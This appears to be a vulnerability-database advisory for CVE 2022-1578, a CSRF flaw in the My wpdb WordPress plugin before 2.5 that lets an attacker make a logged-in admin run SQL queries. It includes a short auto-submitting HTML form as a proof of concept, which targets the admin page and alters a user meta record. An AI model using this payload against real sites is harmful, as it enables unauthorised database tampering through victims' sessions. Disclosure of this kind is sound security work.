My wpdb < 2.5 – Arbitrary SQL Query via CSRF | CVE 2022-1578 | Plugin Vulnerabilities

Description

The plugin is missing CSRF check when running SQL queries, which could allow attacker to make a logged in admin run arbitrary SQL query via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/?page=mywpdb_page&table=wp_usermeta&where%5Bumeta_id%5D=1" method="POST">
    <input type="text" name="umeta_id" value="1">
    <input type="text" name="user_id" value="1">
    <input type="text" name="meta_key" value="nickname">
    <input type="text" name="meta_value" value="test1111111">
    <input type="text" name="mywpdbUpdateTrigger" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Fixed in 2.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

c280da92-4ac2-43ea-93a2-6c583b79b98b

Timeline

Publicly Published

2022-10-28 (about 3 years ago)

Added

2022-10-28 (about 3 years ago)

Last Updated

2022-10-28 (about 3 years ago)

Other

Published

Title

Published

2025-02-16

Title

WP-PManager <= 1.2 - Category Deletion via CSRF

Published

2023-10-19

Title

Duplicate <= 0.1.6 - CSRF

Published

2023-10-12

Title

Taggbox <= 3.3 - Cross-Site Request Forgery

Published

2025-02-13

Title

RSS Filter <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-03-29

Title

Popup Cart Lite for WooCommerce <= 1.1 - Cross-Site Request Forgery